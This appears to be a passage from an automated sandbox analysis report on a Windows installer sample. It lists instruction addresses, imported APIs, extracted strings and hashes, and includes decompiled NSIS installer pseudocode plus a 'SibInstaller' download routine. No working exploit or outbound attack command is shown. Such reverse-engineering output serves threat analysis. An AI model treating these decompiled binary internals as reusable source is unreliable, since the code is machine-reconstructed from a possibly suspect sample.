                                                                                                                0x00402b48
                                                                                                                0x00402b48
                                                                                                                0x00402b70
                                                                                                                0x00402b73
                                                                                                                0x00402b93
                                                                                                                0x00402b93
                                                                                                                0x00000000
                                                                                                                0x00402b75
                                                                                                                0x00402b76
                                                                                                                0x00402b7f
                                                                                                                0x00402b85
                                                                                                                0x00402b8b
                                                                                                                0x00402b8d
                                                                                                                0x00402384
                                                                                                                0x00402384
                                                                                                                0x00402387
                                                                                                                0x00402387
                                                                                                                0x00000000
                                                                                                                0x00402387
                                                                                                                0x00000000
                                                                                                                0x00402b8d
                                                                                                                0x00000000
                                                                                                                0x00402b9f
                                                                                                                0x00402ba1
                                                                                                                0x00402ba2
                                                                                                                0x00402ba7
                                                                                                                0x00402baa
                                                                                                                0x00402bad
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402bb3
                                                                                                                0x00402bb8
                                                                                                                0x00402bba
                                                                                                                0x00402bbc
                                                                                                                0x00402bbc
                                                                                                                0x00402bbf
                                                                                                                0x00402bc2
                                                                                                                0x00000000
                                                                                                                0x00402bc8
                                                                                                                0x00402bc9
                                                                                                                0x00402bd1
                                                                                                                0x00402bd4
                                                                                                                0x00402bd7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402bdd
                                                                                                                0x00402bdf
                                                                                                                0x00402be6
                                                                                                                0x00402bed
                                                                                                                0x00402bf3
                                                                                                                0x00402bf5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402bfb
                                                                                                                0x00402bff
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402c01
                                                                                                                0x00402c04
                                                                                                                0x00402c3f
                                                                                                                0x00000000
                                                                                                                0x00402c3f
                                                                                                                0x00402c0e
                                                                                                                0x00402c14
                                                                                                                0x00402c1a
                                                                                                                0x00402c1d
                                                                                                                0x00402c1f
                                                                                                                0x00402c4f
                                                                                                                0x00402c4f
                                                                                                                0x00402c52
                                                                                                                0x00402c6b
                                                                                                                0x00402c6b
                                                                                                                0x00402c6d
                                                                                                                0x00402c6e
                                                                                                                0x00000000
                                                                                                                0x00402c6e
                                                                                                                0x00402c54
                                                                                                                0x00402c58
                                                                                                                0x00402c60
                                                                                                                0x00402c60
                                                                                                                0x00000000
                                                                                                                0x00402c60
                                                                                                                0x00402c5a
                                                                                                                0x00402c5e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402c5e
                                                                                                                0x00402c21
                                                                                                                0x00402c23
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402c25
                                                                                                                0x00402c29
                                                                                                                0x00402c2d
                                                                                                                0x00402c30
                                                                                                                0x00402c31
                                                                                                                0x00402c34
                                                                                                                0x00402c36
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402c38
                                                                                                                0x00402c3b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402c3d
                                                                                                                0x00000000
                                                                                                                0x00402bdf
                                                                                                                0x00000000
                                                                                                                0x00402c8a
                                                                                                                0x00402c8d
                                                                                                                0x00402ca4
                                                                                                                0x00402caa
                                                                                                                0x00402c8f
                                                                                                                0x00402c8f
                                                                                                                0x00402c91
                                                                                                                0x00402c92
                                                                                                                0x00402c97
                                                                                                                0x00402c9d
                                                                                                                0x00402c9f
                                                                                                                0x00402c9f
                                                                                                                0x00402caf
                                                                                                                0x00402cb2
                                                                                                                0x00000000
                                                                                                                0x00402cb8
                                                                                                                0x00402cb9
                                                                                                                0x00402cbd
                                                                                                                0x00402cc6
                                                                                                                0x00402ccc
                                                                                                                0x00401a0b
                                                                                                                0x00401a0b
                                                                                                                0x00000000
                                                                                                                0x00401a0b
                                                                                                                0x00000000
                                                                                                                0x00402cd7
                                                                                                                0x00402cd9
                                                                                                                0x00402cda
                                                                                                                0x00402cdf
                                                                                                                0x00402ce2
                                                                                                                0x00402ce5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402ceb
                                                                                                                0x00402cf0
                                                                                                                0x00402cf2
                                                                                                                0x00402cf4
                                                                                                                0x00402cf4
                                                                                                                0x00402cf7
                                                                                                                0x00402cfa
                                                                                                                0x00402c7b
                                                                                                                0x00402c7b
                                                                                                                0x00000000
                                                                                                                0x00402d00
                                                                                                                0x00402d01
                                                                                                                0x00402d09
                                                                                                                0x00402d0c
                                                                                                                0x00402d0f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402d15
                                                                                                                0x00402d17
                                                                                                                0x00402d1e
                                                                                                                0x00402d25
                                                                                                                0x00402d2b
                                                                                                                0x00402d2d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402d33
                                                                                                                0x00402d37
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402d3d
                                                                                                                0x00402d40
                                                                                                                0x00402d72
                                                                                                                0x00402c43
                                                                                                                0x00402c45
                                                                                                                0x00000000
                                                                                                                0x00402c45
                                                                                                                0x00402d42
                                                                                                                0x00402d47
                                                                                                                0x00402d7b
                                                                                                                0x00402d7b
                                                                                                                0x00402d7f
                                                                                                                0x00402d83
                                                                                                                0x00402d99
                                                                                                                0x00402d99
                                                                                                                0x00402d9b
                                                                                                                0x00402d9c
                                                                                                                0x00402c70
                                                                                                                0x00402c73
                                                                                                                0x00000000
                                                                                                                0x00402c73
                                                                                                                0x00402d85
                                                                                                                0x00402d89
                                                                                                                0x00402c64
                                                                                                                0x00402c64
                                                                                                                0x00402c68
                                                                                                                0x00000000
                                                                                                                0x00402c68
                                                                                                                0x00402d8f
                                                                                                                0x00402d93
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402d93
                                                                                                                0x00402d49
                                                                                                                0x00402d4e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402d50
                                                                                                                0x00402d54
                                                                                                                0x00402d57
                                                                                                                0x00402d5b
                                                                                                                0x00402d5c
                                                                                                                0x00402d5f
                                                                                                                0x00402d62
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402d68
                                                                                                                0x00402d6b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402d6d
                                                                                                                0x00402c7d
                                                                                                                0x00402c7d
                                                                                                                0x00402c7f
                                                                                                                0x00402c83
                                                                                                                0x00401a0d
                                                                                                                0x00401a0d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00401a0d
                                                                                                                0x00000000
                                                                                                                0x00402da3
                                                                                                                0x00402da5
                                                                                                                0x00402da6
                                                                                                                0x00000000
                                                                                                                0x00402dac
                                                                                                                0x00402dac
                                                                                                                0x00402daf
                                                                                                                0x00402db0
                                                                                                                0x00402db2
                                                                                                                0x00402db3
                                                                                                                0x00402dba
                                                                                                                0x00402dc0
                                                                                                                0x00402dc6
                                                                                                                0x00402dc9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402dc9
                                                                                                                0x00000000
                                                                                                                0x00402dd6
                                                                                                                0x00402dd8
                                                                                                                0x00402dd9
                                                                                                                0x00402de6
                                                                                                                0x00402de6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402df1
                                                                                                                0x00402df4
                                                                                                                0x004019ec
                                                                                                                0x004019ec
                                                                                                                0x004019ee
                                                                                                                0x004019f5
                                                                                                                0x00000000
                                                                                                                0x004019f5
                                                                                                                0x00402dfa
                                                                                                                0x00402e02
                                                                                                                0x00402e08
                                                                                                                0x00402e0e
                                                                                                                0x00402e10
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402e1a
                                                                                                                0x00402e1f
                                                                                                                0x00402e27
                                                                                                                0x00402e2d
                                                                                                                0x00402e30
                                                                                                                0x00402e3e
                                                                                                                0x00402e43
                                                                                                                0x00402e43
                                                                                                                0x00402e49
                                                                                                                0x00402e4a
                                                                                                                0x00000000
                                                                                                                0x00402e4a
                                                                                                                0x00402e32
                                                                                                                0x00402e34
                                                                                                                0x00402b19
                                                                                                                0x00402b19
                                                                                                                0x00402b1b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402e57
                                                                                                                0x00402e5e
                                                                                                                0x00402e63
                                                                                                                0x00402e66
                                                                                                                0x00402e69
                                                                                                                0x00402e6e
                                                                                                                0x00402e70
                                                                                                                0x00402e74
                                                                                                                0x00402e74
                                                                                                                0x00402e7a
                                                                                                                0x00402e87
                                                                                                                0x00402e8c
                                                                                                                0x00402e8f
                                                                                                                0x00402e92
                                                                                                                0x00402f35
                                                                                                                0x00402f35
                                                                                                                0x00402f40
                                                                                                                0x00402f48
                                                                                                                0x00402f4a
                                                                                                                0x00402f4b
                                                                                                                0x00402f4e
                                                                                                                0x00402f50
                                                                                                                0x00402f52
                                                                                                                0x00402f56
                                                                                                                0x00402f5c
                                                                                                                0x00402f5c
                                                                                                                0x00402f64
                                                                                                                0x00000000
                                                                                                                0x00402e98
                                                                                                                0x00402e98
                                                                                                                0x00402e9d
                                                                                                                0x00402ea6
                                                                                                                0x00402eab
                                                                                                                0x00402ead
                                                                                                                0x00402eaf
                                                                                                                0x00402f2c
                                                                                                                0x00402f2f
                                                                                                                0x00000000
                                                                                                                0x00402f2f
                                                                                                                0x00402ebb
                                                                                                                0x00402ec7
                                                                                                                0x00402ec9
                                                                                                                0x00402ecc
                                                                                                                0x00402ece
                                                                                                                0x00402f04
                                                                                                                0x00402f10
                                                                                                                0x00402f17
                                                                                                                0x00402f29
                                                                                                                0x00000000
                                                                                                                0x00402f29
                                                                                                                0x00402ed8
                                                                                                                0x00402ef7
                                                                                                                0x00402ef7
                                                                                                                0x00402ef9
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402edf
                                                                                                                0x00402ee1
                                                                                                                0x00402ee5
                                                                                                                0x00402ee9
                                                                                                                0x00402eec
                                                                                                                0x00402eef
                                                                                                                0x00402ef4
                                                                                                                0x00402ef4
                                                                                                                0x00402ef4
                                                                                                                0x00402efe
                                                                                                                0x00000000
                                                                                                                0x00402efe
                                                                                                                0x00000000
                                                                                                                0x00402f6e
                                                                                                                0x00402f70
                                                                                                                0x00402fb5
                                                                                                                0x00402fb6
                                                                                                                0x00401957
                                                                                                                0x00401957
                                                                                                                0x0040195c
                                                                                                                0x004017ab
                                                                                                                0x004017ab
                                                                                                                0x00000000
                                                                                                                0x004017ab
                                                                                                                0x00402f7d
                                                                                                                0x00402f86
                                                                                                                0x00402f8b
                                                                                                                0x00402f93
                                                                                                                0x00402f96
                                                                                                                0x00402fa4
                                                                                                                0x00402f98
                                                                                                                0x00402f98
                                                                                                                0x00402f98
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402fc0
                                                                                                                0x00402fc2
                                                                                                                0x00402fc7
                                                                                                                0x00402fca
                                                                                                                0x00402fd0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00402fd6
                                                                                                                0x00402fd8
                                                                                                                0x00402fdb
                                                                                                                0x00402fe1
                                                                                                                0x00402fe7
                                                                                                                0x00402fe9
                                                                                                                0x00403003
                                                                                                                0x00403003
                                                                                                                0x00403005
                                                                                                                0x00403008
                                                                                                                0x0040301a
                                                                                                                0x0040301e
                                                                                                                0x00403023
                                                                                                                0x00403023
                                                                                                                0x00403023
                                                                                                                0x0040300a
                                                                                                                0x0040300a
                                                                                                                0x0040300c
                                                                                                                0x00403012
                                                                                                                0x00403012
                                                                                                                0x0040302a
                                                                                                                0x0040302d
                                                                                                                0x00403030
                                                                                                                0x00403033
                                                                                                                0x00403036
                                                                                                                0x0040303f
                                                                                                                0x0040303f
                                                                                                                0x00000000
                                                                                                                0x00403036
                                                                                                                0x00402feb
                                                                                                                0x00402fee
                                                                                                                0x00402ffa
                                                                                                                0x00000000
                                                                                                                0x00402ffa
                                                                                                                0x00402ff3
                                                                                                                0x00402ff4
                                                                                                                0x00402e4b
                                                                                                                0x00402e4b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00403049
                                                                                                                0x0040304b
                                                                                                                0x00403050
                                                                                                                0x00403053
                                                                                                                0x00401a13
                                                                                                                0x00401a13
                                                                                                                0x00000000
                                                                                                                0x00401a13
                                                                                                                0x00403059
                                                                                                                0x0040305c
                                                                                                                0x0040307d
                                                                                                                0x00403080
                                                                                                                0x00403094
                                                                                                                0x004030a2
                                                                                                                0x00403082
                                                                                                                0x00403082
                                                                                                                0x00403085
                                                                                                                0x0040308b
                                                                                                                0x0040308b
                                                                                                                0x00000000
                                                                                                                0x00403080
                                                                                                                0x0040305e
                                                                                                                0x00403061
                                                                                                                0x00403073
                                                                                                                0x00402dcf
                                                                                                                0x00402dcf
                                                                                                                0x00402dd0
                                                                                                                0x00402dd0
                                                                                                                0x00000000
                                                                                                                0x00402dd0
                                                                                                                0x0040306b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004030af
                                                                                                                0x004030b7
                                                                                                                0x004030bd
                                                                                                                0x004030c0
                                                                                                                0x004030c7
                                                                                                                0x004030c7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004030d1
                                                                                                                0x004030d7
                                                                                                                0x004030dc
                                                                                                                0x004030dc
                                                                                                                0x004030dd
                                                                                                                0x004030dd
                                                                                                                0x004030de
                                                                                                                0x004030de
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                • Sleep.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                • ShowWindow.USER32(?), ref: 00401753
                                                                                                                • ShowWindow.USER32(?), ref: 00401767
                                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                • GetFileAttributesW.KERNEL32(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                • GetShortPathNameW.KERNEL32 ref: 004019BF
                                                                                                                • SearchPathW.KERNEL32(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                Strings
                                                                                                                • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                • Jump: %d, xrefs: 00401602
                                                                                                                • Rename: %s, xrefs: 004018F8
                                                                                                                • Rename on reboot: %s, xrefs: 00401943
                                                                                                                • Call: %d, xrefs: 0040165A
                                                                                                                • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                • detailprint: %s, xrefs: 00401679
                                                                                                                • Aborting: "%s", xrefs: 0040161D
                                                                                                                • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                • BringToFront, xrefs: 004016BD
                                                                                                                • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                • Sleep(%d), xrefs: 0040169D
                                                                                                                • Rename failed: %s, xrefs: 0040194B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.467867946.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.467855294.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467893180.0000000000409000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467913204.000000000040C000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467933755.0000000000420000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.467974514.000000000046B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.468002709.0000000000534000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                • API String ID: 2872004960-3619442763
                                                                                                                • Opcode ID: 0aacebd35cab78dd9e56fb0c34c611705e18b02e61851c41ce70807ba0770869
                                                                                                                • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                • Opcode Fuzzy Hash: 0aacebd35cab78dd9e56fb0c34c611705e18b02e61851c41ce70807ba0770869
                                                                                                                • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 6FEA47D0, Relevance: 49.3, APIs: 23, Strings: 5, Instructions: 332memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEA482D
                                                                                                                  • Part of subcall function 6FEB1050: _DebugHeapAllocator.LIBCPMTD ref: 6FEB10C6
                                                                                                                  • Part of subcall function 6FEB1050: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 6FEB10D2
                                                                                                                  • Part of subcall function 6FEB1050: std::ios_base::good.LIBCPMTD ref: 6FEB10DA
                                                                                                                  • Part of subcall function 6FEA5840: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCONCRTD ref: 6FEA584A
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEA4852
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEA4876
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEA48B2
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEA4954
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEA499D
                                                                                                                • PathFileExistsW.SHLWAPI(00000000,?,?,?,3A83C854), ref: 6FEA4BB9
                                                                                                                • _DebugHeapAllocator.LIBCPMTD ref: 6FEA4BDF
                                                                                                                Strings
                                                                                                                • 8O{, xrefs: 6FEA4A15
                                                                                                                • downloading %s, xrefs: 6FEA4939
                                                                                                                • C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibInstaller\Install.cpp, xrefs: 6FEA4A2A
                                                                                                                • C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibInstaller\Install.cpp, xrefs: 6FEA48E8
                                                                                                                • C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibInstaller\Install.cpp, xrefs: 6FEA4B4E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000F.00000002.476562413.000000006FEA1000.00000020.00020000.sdmp, Offset: 6FEA0000, based on PE: true
                                                                                                                • Associated: 0000000F.00000002.476545791.000000006FEA0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476631772.000000006FF05000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476743631.000000006FF1B000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476772011.000000006FF1E000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000F.00000002.476792041.000000006FF20000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AllocatorDebugHeap$Base::Concurrency::details::ContextIdentityQueueWork$ExistsFilePathstd::ios_base::good
                                                                                                                • String ID: 8O{$C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibInstaller\Install.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibInstaller\Install.cpp$C:\Users\Operations\Source\Workspaces\Sib\Sibl\SibInstaller\Install.cpp$downloading %s
                                                                                                                • API String ID: 1817047942-2495708356
                                                                                                                • Opcode ID: 7085b612d7d5724e9a46a8660cef9e49f7a6b1fcf7a0462d41f18ff1c69550d1
                                                                                                                • Instruction ID: 9d948e49bf61f0aa532fe994bcbd7f56bbef81c72baa0fddf7d4ee6fef530bce
                                                                                                                • Opcode Fuzzy Hash: 7085b612d7d5724e9a46a8660cef9e49f7a6b1fcf7a0462d41f18ff1c69550d1
                                                                                                                • Instruction Fuzzy Hash: E4D14CB0D14209ABDB04DFA4CD55BEEBB74BF14318F24452DE412BB2D0EB716A44CB66
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405958, Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E00405958(signed int __ecx) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				intOrPtr _v20;
				short _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t28;
				short _t29;
				short _t30;
				void* _t39;
				void* _t41;
				int _t42;
				void* _t45;
				struct HINSTANCE__* _t48;
				int _t49;
				int _t53;
				short _t75;
				WCHAR* _t77;
				signed char _t81;
				short* _t83;
				short _t90;
				intOrPtr _t91;
				WCHAR* _t94;
				intOrPtr _t96;
				WCHAR* _t101;

				_t89 = __ecx;
				_t96 =  *0x47eabc;
				_t28 = E00406328(6);
				_t103 = _t28;
				if(_t28 == 0) {
					_t29 = 0x30;
					 *0x4df0c0 = _t29;
					_t30 = 0x78;
					_t94 = 0x451d98;
					 *0x4df0c2 = _t30;
					 *0x4df0c4 = 0;
					E00405EFF(0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x451d98, 0);
					__eflags =  *0x451d98;
					if(__eflags == 0) {
						E00405EFF(0x80000003, L".DEFAULT\\Control Panel\\International",  &M0040A4A4, 0x451d98, 0);
					}
					lstrcatW(0x4df0c0, _t94);
				} else {
					E00405F7D(0x4df0c0,  *_t28() & 0x0000ffff);
				}
				E00403EC1(_t89, _t103);
				 *0x47eb60 =  *0x47eb08 & 0x00000020;
				 *0x47eb7c = 0x10000;
				if(E004067AA(_t103, 0x4d30a8) != 0) {
					L16:
					if(E004067AA(_t112, 0x4d30a8) == 0) {
						E00406831(0, _t94, _t96, 0x4d30a8,  *((intOrPtr*)(_t96 + 0x118)));
					}
					if(( *0x47eb08 & 0x00000010) != 0 &&  *0x47eb04 == 0) {
						E00403EA0();
						 *0x46d204 = 1;
					}
					_t39 = LoadImageW( *0x47eab8, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x476a70 = _t39;
					if( *((intOrPtr*)(_t96 + 0x50)) == 0xffffffff) {
						L24:
						if(E0040141D(0) == 0) {
							_t41 = E00403EC1(_t89, __eflags);
							__eflags =  *0x47eb80;
							if( *0x47eb80 != 0) {
								_t42 = E00405073(_t41, 0);
								__eflags = _t42;
								if(_t42 == 0) {
									E0040141D(1);
									goto L36;
								}
								__eflags =  *0x476a74;
								if( *0x476a74 == 0) {
									E0040141D(2);
								}
								goto L25;
							}
							ShowWindow( *0x441d70, 5);
							_t48 = LoadLibraryW(L"RichEd20");
							__eflags = _t48;
							if(_t48 == 0) {
								LoadLibraryW(L"RichEd32");
							}
							_t101 = L"RichEdit20A";
							_t49 = GetClassInfoW(0, _t101, 0x476a40);
							__eflags = _t49;
							if(_t49 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x476a40);
								 *0x476a64 = _t101;
								RegisterClassW(0x476a40);
							}
							_t53 = DialogBoxParamW( *0x47eab8,  *0x476a7c + 0x00000069 & 0x0000ffff, 0, E004054A5, 0);
							E00403C94(E0040141D(5), 1);
							return _t53;
						}
						L25:
						_t45 = 2;
						return _t45;
					} else {
						_t90 =  *L"_Nb"; // 0x4e005f
						_v24 = _t90;
						_t91 =  *0x40a404; // 0x62
						_v20 = _t91;
						_t89 =  *0x47eab8;
						 *0x476a54 = _t39;
						 *0x476a44 = E00401000;
						 *0x476a50 =  *0x47eab8;
						 *0x476a64 =  &_v24;
						if(RegisterClassW(0x476a40) == 0) {
							L36:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x441d70 = CreateWindowExW(0x80,  &_v24, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x47eab8, 0);
						goto L24;
					}
				} else {
					_t89 =  *(_t96 + 0x48);
					if( *(_t96 + 0x48) == 0) {
						goto L16;
					}
					_t94 = 0x46e220;
					E00405EFF( *((intOrPtr*)(_t96 + 0x44)),  *0x47ead8 + _t89 * 2,  *0x47ead8 +  *(_t96 + 0x4c) * 2, 0x46e220, 0);
					_t75 =  *0x46e220;
					if(_t75 == 0) {
						goto L16;
					}
					if(_t75 == 0x22) {
						_t94 = 0x46e222;
						_t83 = E00405D32(0x46e222, 0x22);
						_t89 = 0;
						 *_t83 = 0;
					}
					_t9 = lstrlenW(_t94) * 2; // 0x46e21a
					_t77 = _t94 + _t9 - 8;
					if(_t77 <= _t94 || lstrcmpiW(_t77, L".exe") != 0) {
						L15:
						E00406035(0x4d30a8, E0040674E(_t94));
						goto L16;
					} else {
						_t81 = GetFileAttributesW(_t94);
						if(_t81 == 0xffffffff) {
							L14:
							E0040677D(_t94);
							goto L15;
						}
						_t112 = _t81 & 0x00000010;
						if((_t81 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}































                                                                                                                0x00405958
                                                                                                                0x0040595e
                                                                                                                0x00405967
                                                                                                                0x0040596e
                                                                                                                0x00405970
                                                                                                                0x00405986
                                                                                                                0x00405989
                                                                                                                0x0040598f
                                                                                                                0x00405991
                                                                                                                0x00405998
                                                                                                                0x004059aa
                                                                                                                0x004059b0
                                                                                                                0x004059b5
                                                                                                                0x004059bc
                                                                                                                0x004059cf
                                                                                                                0x004059cf
                                                                                                                0x004059da
                                                                                                                0x00405972
                                                                                                                0x0040597d
                                                                                                                0x0040597d
                                                                                                                0x004059df
                                                                                                                0x004059f2
                                                                                                                0x004059f7
                                                                                                                0x00405a08
                                                                                                                0x00405a9c
                                                                                                                0x00405aa4
                                                                                                                0x00405aad
                                                                                                                0x00405aad
                                                                                                                0x00405ab9
                                                                                                                0x00405ac3
                                                                                                                0x00405ac8
                                                                                                                0x00405ac8
                                                                                                                0x00405ae3
                                                                                                                0x00405ae9
                                                                                                                0x00405af7
                                                                                                                0x00405b92
                                                                                                                0x00405b9a
                                                                                                                0x00405ba4
                                                                                                                0x00405ba9
                                                                                                                0x00405baf
                                                                                                                0x00405c39
                                                                                                                0x00405c3e
                                                                                                                0x00405c40
                                                                                                                0x00405c5c
                                                                                                                0x00000000
                                                                                                                0x00405c5c
                                                                                                                0x00405c42
                                                                                                                0x00405c48
                                                                                                                0x00405c50
                                                                                                                0x00405c50
                                                                                                                0x00000000
                                                                                                                0x00405c48
                                                                                                                0x00405bbd
                                                                                                                0x00405bce
                                                                                                                0x00405bd0
                                                                                                                0x00405bd2
                                                                                                                0x00405bd9
                                                                                                                0x00405bd9
                                                                                                                0x00405be2
                                                                                                                0x00405be9
                                                                                                                0x00405beb
                                                                                                                0x00405bed
                                                                                                                0x00405bf6
                                                                                                                0x00405bf9
                                                                                                                0x00405bff
                                                                                                                0x00405bff
                                                                                                                0x00405c1e
                                                                                                                0x00405c2f
                                                                                                                0x00000000
                                                                                                                0x00405c34
                                                                                                                0x00405b9c
                                                                                                                0x00405b9e
                                                                                                                0x00000000
                                                                                                                0x00405afd
                                                                                                                0x00405afd
                                                                                                                0x00405b03
                                                                                                                0x00405b07
                                                                                                                0x00405b0d
                                                                                                                0x00405b11
                                                                                                                0x00405b17
                                                                                                                0x00405b21
                                                                                                                0x00405b2b
                                                                                                                0x00405b31
                                                                                                                0x00405b3f
                                                                                                                0x00405c61
                                                                                                                0x00405c61
                                                                                                                0x00000000
                                                                                                                0x00405c61
                                                                                                                0x00405b4e
                                                                                                                0x00405b8d
                                                                                                                0x00000000
                                                                                                                0x00405b8d
                                                                                                                0x00405a0e
                                                                                                                0x00405a0e
                                                                                                                0x00405a13
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405a22
                                                                                                                0x00405a33
                                                                                                                0x00405a38
                                                                                                                0x00405a41
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405a47
                                                                                                                0x00405a4b
                                                                                                                0x00405a51
                                                                                                                0x00405a56
                                                                                                                0x00405a58
